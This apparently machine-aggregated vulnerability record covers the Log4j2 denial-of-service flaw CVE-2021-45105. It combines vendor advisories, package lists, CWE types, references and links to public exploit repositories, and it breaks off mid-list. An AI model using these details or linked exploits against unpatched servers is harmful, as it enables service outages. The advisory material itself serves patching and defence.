Authentication is not required to exploit this vulnerability. The specific flaw exists within the StrSubstitutor class. The issue results from the lack of proper validation of user-supplied data, which can result in a resource exhaustion condition. An attacker can leverage this vulnerability to create a denial-of-service condition on the process. Log4j is an open source project of Apache. With Log4j, log output can be directed to a console, a file, a GUI component, or even a socket server, an NT event recorder, etc. Apache Log4j2 has a denial of service vulnerability. The vulnerability arises when Apache Log4j2 is configured with a non-default Pattern Layout that uses a Context Lookup (for example: $${ctx:loginId}); attackers can construct malicious data and carry out a denial-of-service attack without authorization, eventually causing a denial of service on the server. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update\nAdvisory ID: RHSA-2022:1297-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:1297\nIssue date: 2022-04-11\nCVE Names: CVE-2021-4104 CVE-2021-44832 CVE-2021-45046 \n CVE-2021-45105 CVE-2022-23302 CVE-2022-23305 \n CVE-2022-23307 \n=====================================================================\n\n1. Summary:\n\nA security update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.4 for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. 
A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss EAP 7.4 for RHEL 8 - noarch, x86_64\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.4.4 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* log4j: SQL injection in Log4j 1.x when application is configured to use\nJDBCAppender (CVE-2022-23305)\n\n* log4j: Unsafe deserialization flaw in Chainsaw log viewer\n(CVE-2022-23307)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured\nto use JMSAppender (CVE-2021-4104)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and\ncontext lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data\ncontains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured\nto use JMSSink (CVE-2022-23302)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. 
\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031667 - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender\n2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)\n2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern\n2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender\n2041949 - CVE-2022-23302 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink\n2041959 - CVE-2022-23305 log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender\n2041967 - CVE-2022-23307 log4j: Unsafe deserialization flaw in Chainsaw log viewer\n\n6. 
JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7\nJBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1\nJBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034\nJBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17)\nJBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console\nJBEAP-22839 - [GSS](7.4.z) Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001\nJBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001\nJBEAP-22900 - Tracker bug for the EAP 7.4.4 release for RHEL-8\nJBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002\nJBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001\nJBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001\nJBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001\nJBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001\nJBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001\nJBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002\nJBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final\nJBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final\nJBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001\nJBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final\nJBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001\nJBEAP-23143 - (7.4.z) Upgrade from 
org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26\nJBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001\nJBEAP-23323 - [GSS](7.4.z) WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend\nJBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002\nJBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001\nJBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002\n\n7. Package List:\n\nRed Hat JBoss EAP 7.4 for RHEL 8:\n\nSource:\neap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.src.rpm\neap7-ecj-3.26.0-1.redhat_00002.1.el8eap.src.rpm\neap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.src.rpm\neap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.src.rpm\neap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-log4j-2.17.1-1.redhat_00001.1.el8eap.src.rpm\neap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.src.rpm\neap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.src.rpm\neap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.src.rpm\neap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.src.rpm\neap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.src.rpm\neap7-xom-1.3.7-1.redhat_00001.1.el8eap.src.rpm\neap7-yasson-1.0.10-1.redhat_00001.1.el8eap.src.rpm\n\nnoarch:\neap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-cli-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-commons-2.16.0-
7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-core-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-dto-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-hornetq-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-hqclient-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jdbc-store-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jms-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jms-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-journal-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-ra-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-selector-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-service-extensions-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-tools-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-ecj-3.26.0-1.redhat_00002.1.el8eap.noarch.rpm\neap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-core-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-entitymanager-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-envers-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-java8-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-cachestore-jdbc-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-cachestore-remote-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-client-hotrod-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-component-annotations-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-core-11.0.15-1.Final_red
hat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-spi-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-v53-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-server-migration-cli-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-server-migration-core-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-log4j-2.17.1-1.redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-compensations-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jbosstxbridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jbossxts-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jts-idlj-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jts-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-api-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-bridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-util-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-txframework-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.noarch.rpm\neap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm\neap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-elytron-tool-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-javadocs-7.4.4-3.GA_redhat_00011.1.el8eap.noarc
h.rpm\neap7-wildfly-modules-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm\neap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-openssl-java-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-xom-1.3.7-1.redhat_00001.1.el8eap.noarch.rpm\neap7-yasson-1.0.10-1.redhat_00001.1.el8eap.noarch.rpm\n\nx86_64:\neap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm\neap7-wildfly-openssl-el8-x86_64-debuginfo-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-4104\nhttps://access.redhat.com/security/cve/CVE-2021-44832\nhttps://access.redhat.com/security/cve/CVE-2021-45046\nhttps://access.redhat.com/security/cve/CVE-2021-45105\nhttps://access.redhat.com/security/cve/CVE-2022-23302\nhttps://access.redhat.com/security/cve/CVE-2022-23305\nhttps://access.redhat.com/security/cve/CVE-2022-23307\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/\n\n9. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYlRUqtzjgjWX9erEAQhXfxAApQ6HkBUo8Tg+GWEosSpAx0AEsVPMojWK\nHU3uJRF8jp0KXqchc+KVlalBJAWHPBUDr4xBpsISqwr7T/9iYonKlo4ijA/68b2K\nkhbFyt6o6i2dXrYygT5fcMtukSjN2T/hfCc2ZE2yiHTO3Ou4AALyZ2xCyYtfSpuZ\nrZLVvgCWrnak2msgkoNl0/sZxnjw6b+ZJczKkq3QqPVWOYlV/Qdl5NGy16i0rbEo\nP1rWXJrOUlEBctJEs756cqeIJesYKHZqqPx/kHaNyzdxDh99hKGZx7oturscAN6e\nsPfSSdyd5jsOcWD7UlHV9ukoPQxf1ouVBa0qkpL0wCoR3GFF6Pls1bMEFzUoz3/R\nIwagVxsr38duK3isv34l6IQ+RP0oSWN0rgPUu69tAlEV+YwLgA5JUOpz1i7FTmXt\nl3i5+wMlo9Xc/Hy+j7unW8Do7s/i0YuFVTuM6H9KEITuFjgFA2tB9CpzoAFzWLk0\nU8zCL80Rwy1wiMydSrLjtg3YUPB6ibh2NJ02O7R+bNhJ8bN4yuDuWkDqy4VdPXGp\nzhed3dZmYAXD9/x+mnfghcbJZwigzGT9Qv78zYafB3f8K7cEVEDJK3aZMOkkh9ca\ndcaLs5WRv8ZTytFPv+KGKRJ/cc/UHAvh8zumMZdVMp1oty/k/OYWhgaEJMWGQDCe\nUnHI/WwB37w=\n=eCh2\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. =========================================================================\nUbuntu Security Notice USN-5222-1\nJanuary 11, 2022\n\napache-log4j2 vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.10\n- Ubuntu 21.04\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Apache Log4j 2. This issue only affected Ubuntu 18.04 LTS. 
\n(CVE-2021-45105)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.10:\n liblog4j2-java 2.17.1-0.21.10.1\n\nUbuntu 21.04:\n liblog4j2-java 2.17.1-0.21.04.1\n\nUbuntu 20.04 LTS:\n liblog4j2-java 2.17.1-0.20.04.1\n\nUbuntu 18.04 LTS:\n liblog4j2-java 2.12.4-0ubuntu0.1\n\nIn general, a standard system update will make all the necessary changes. Solution:\n\nFor OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html\n\n4", sources: [ { db: "NVD", id: "CVE-2021-45105", }, { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "VULMON", id: "CVE-2021-45105", }, { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "166798", }, { db: "PACKETSTORM", id: "165516", }, { db: "PACKETSTORM", id: "165552", }, ], trust: 2.25, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2021-45105", trust: 2.5, }, { db: "ZDI", id: "ZDI-21-1541", trust: 1.8, }, { db: "CERT/CC", id: "VU#930724", trust: 1.1, }, { db: "SIEMENS", id: "SSA-501673", trust: 1.1, }, { db: "SIEMENS", id: "SSA-479842", trust: 1.1, }, { db: "OPENWALL", id: "OSS-SECURITY/2021/12/19/1", trust: 1.1, }, { db: "ZDI_CAN", id: "ZDI-CAN-16160", trust: 0.7, }, { db: "PACKETSTORM", id: "165516", trust: 0.2, }, { db: "PACKETSTORM", id: 
"165552", trust: 0.2, }, { db: "PACKETSTORM", id: "165636", trust: 0.2, }, { db: "PACKETSTORM", id: "165637", trust: 0.1, }, { db: "PACKETSTORM", id: "165503", trust: 0.1, }, { db: "PACKETSTORM", id: "165373", trust: 0.1, }, { db: "PACKETSTORM", id: "165499", trust: 0.1, }, { db: "PACKETSTORM", id: "165649", trust: 0.1, }, { db: "PACKETSTORM", id: "165497", trust: 0.1, }, { db: "PACKETSTORM", id: "165494", trust: 0.1, }, { db: "PACKETSTORM", id: "165650", trust: 0.1, }, { db: "PACKETSTORM", id: "165648", trust: 0.1, }, { db: "PACKETSTORM", id: "165645", trust: 0.1, }, { db: "PACKETSTORM", id: "165632", trust: 0.1, }, { db: "CNVD", id: "CNVD-2021-101661", trust: 0.1, }, { db: "VULHUB", id: "VHN-408743", trust: 0.1, }, { db: "VULMON", id: "CVE-2021-45105", trust: 0.1, }, { db: "PACKETSTORM", id: "166676", trust: 0.1, }, { db: "PACKETSTORM", id: "166677", trust: 0.1, }, { db: "PACKETSTORM", id: "166798", trust: 0.1, }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULHUB", id: "VHN-408743", }, { db: "VULMON", id: "CVE-2021-45105", }, { db: "PACKETSTORM", id: "165636", }, { db: "PACKETSTORM", id: "166676", }, { db: "PACKETSTORM", id: "166677", }, { db: "PACKETSTORM", id: "166798", }, { db: "PACKETSTORM", id: "165516", }, { db: "PACKETSTORM", id: "165552", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, id: "VAR-202112-1782", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-408743", }, ], trust: 0.01, }, last_update_date: "2024-11-29T20:17:43.970000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Apache has issued an update to correct this vulnerability.", trust: 0.7, url: 
"https://logging.apache.org/log4j/2.x/security.html", }, { title: "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update on RHEL 7", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221462 - Security Advisory", }, { title: "Debian CVElist Bug Report Logs: apache-log4j2: CVE-2021-45105: Certain strings can cause infinite recursion", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=9cdbf0a2dc2003562c697ebd1bd08570", }, { title: "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221469 - Security Advisory", }, { title: "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update on RHEL 8", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221463 - Security Advisory", }, { title: "Debian Security Advisories: DSA-5024-1 apache-log4j2 -- security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories&qid=affead52a755f931c66032144a27568d", }, { title: "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221299 - Security Advisory", }, { title: "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221296 - Security Advisory", }, { title: "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20221297 - Security Advisory", }, { title: "Amazon Linux 2: ALAS2-2021-1733", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2&qid=ALAS2-2021-1733", }, { title: "IBM: Security Bulletin: Apache log4j 
security vulnerability as it relates to IBM Maximo Scheduler Optimization – Apache Log4j – [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15)", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=1239b8de81ba381055ce95c571a45bea", }, { title: "IBM: Security Bulletin: Hortonworks DataFlow product has log messages vulnerable to arbitrary code execution, denial of service, and remote code execution due to Apache Log4j vulnerabilities [CVE-2021-44228], [CVE-2021-45105], and [CVE-2021-45046]", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=7803153fe3afe7b4246685257610b110", }, { title: "IBM: An update on the Apache Log4j 2.x vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=0648a3f00f067d373b069c4f2acd5db4", }, { title: "Siemens Security Advisories: Siemens Security Advisory", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories&qid=1b15bf8c16ace8f01272aa507f950804", }, { title: "Amazon Linux 2022: ALAS2022-2021-008", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022&qid=ALAS2022-2021-008", }, { title: "Cisco: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-apache-log4j-qRuKNEbd", }, { title: "Citrix Security Bulletins: Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins&qid=f1a2b6f4f4568786daf1fc5e893e9283", }, { title: "Siemens Security Advisories: Siemens Security Advisory", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories&qid=6aac0ed5554d7c299f07f7ce8ad8be79", }, { title: "Siemens Security Advisories: Siemens Security Advisory", trust: 0.1, url: 
"https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories&qid=42e3d15623cd7650d7ccb17534ee39a8", }, { title: "CVE-2021-45105", trust: 0.1, url: "https://github.com/tejas-nagchandi/CVE-2021-45105 ", }, { title: "log4j2_dos_exploit", trust: 0.1, url: "https://github.com/iAmSOScArEd/log4j2_dos_exploit ", }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "VULMON", id: "CVE-2021-45105", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-20", trust: 1.1, }, { problemtype: "CWE-674", trust: 1.1, }, ], sources: [ { db: "VULHUB", id: "VHN-408743", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 1.8, url: "https://logging.apache.org/log4j/2.x/security.html", }, { trust: 1.1, url: "https://www.kb.cert.org/vuls/id/930724", }, { trust: 1.1, url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-log4j-qruknebd", }, { trust: 1.1, url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { trust: 1.1, url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { trust: 1.1, url: "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2021-0032", }, { trust: 1.1, url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { trust: 1.1, url: "https://www.debian.org/security/2021/dsa-5024", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { trust: 1.1, url: 
"https://www.zerodayinitiative.com/advisories/zdi-21-1541/", }, { trust: 1.1, url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2021-45105", }, { trust: 0.5, url: "https://access.redhat.com/security/updates/classification/#low", }, { trust: 0.5, url: "https://listman.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2021-45105", }, { trust: 0.5, url: "https://bugzilla.redhat.com/):", }, { trust: 0.5, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.4, url: "https://nvd.nist.gov/vuln/detail/cve-2021-44832", }, { trust: 0.3, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2021-45046", }, { trust: 0.3, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2021-44832", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2021-45046", }, { trust: 0.2, url: "https://access.redhat.com/articles/11258", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-23307", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-23302", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-23305", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2021-4104", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-23302", }, { trust: 0.2, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.2, url: 